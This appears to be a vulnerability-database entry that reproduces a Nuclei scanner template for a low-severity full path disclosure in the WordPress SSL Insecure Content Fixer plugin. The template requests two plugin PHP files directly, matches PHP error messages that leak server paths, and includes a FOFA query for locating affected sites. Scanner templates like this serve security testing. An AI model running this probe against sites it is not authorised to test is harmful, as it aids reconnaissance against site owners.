漏洞描述
WordPress SSL Insecure Content Fixer plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
wp-ssl-insecure-content-fixer-fpd: WordPress Plugin SSL Insecure Content Fixer - Full Path Disclosure
PoC代码[已公开]
id: wp-ssl-insecure-content-fixer-fpd
info:
name: WordPress Plugin SSL Insecure Content Fixer - Full Path Disclosure
author: DhiyaneshDk
severity: low
description: |
WordPress SSL Insecure Content Fixer plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
reference:
- https://wordpress.org/plugins/ssl-insecure-content-fixer/
metadata:
max-request: 1
verified: false
fofa-query: body="/ssl-insecure-content-fixer/"
tags: debug,wordpress,fpd,vuln,ssl-insecure-content-fixer,wp-plugin
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ssl-insecure-content-fixer/includes/nonces.php"
- "{{BaseURL}}/wp-content/plugins/ssl-insecure-content-fixer/nowp/ajax.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 500'
- 'contains(body, "plugins/ssl-insecure-content-fixer")'
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:","failed to open stream")'
condition: and
# digest: 4a0a004730450221008e1702d56b9b52265681a6e00d08fba95c5d369ef5273be867701fc576ca1a46022033d5b57447c5ec4aba11c0f575dd7c60b947d8d5a27e2a3f4d44a64f397c622b:922c64590222798bb761d5b6d8e72950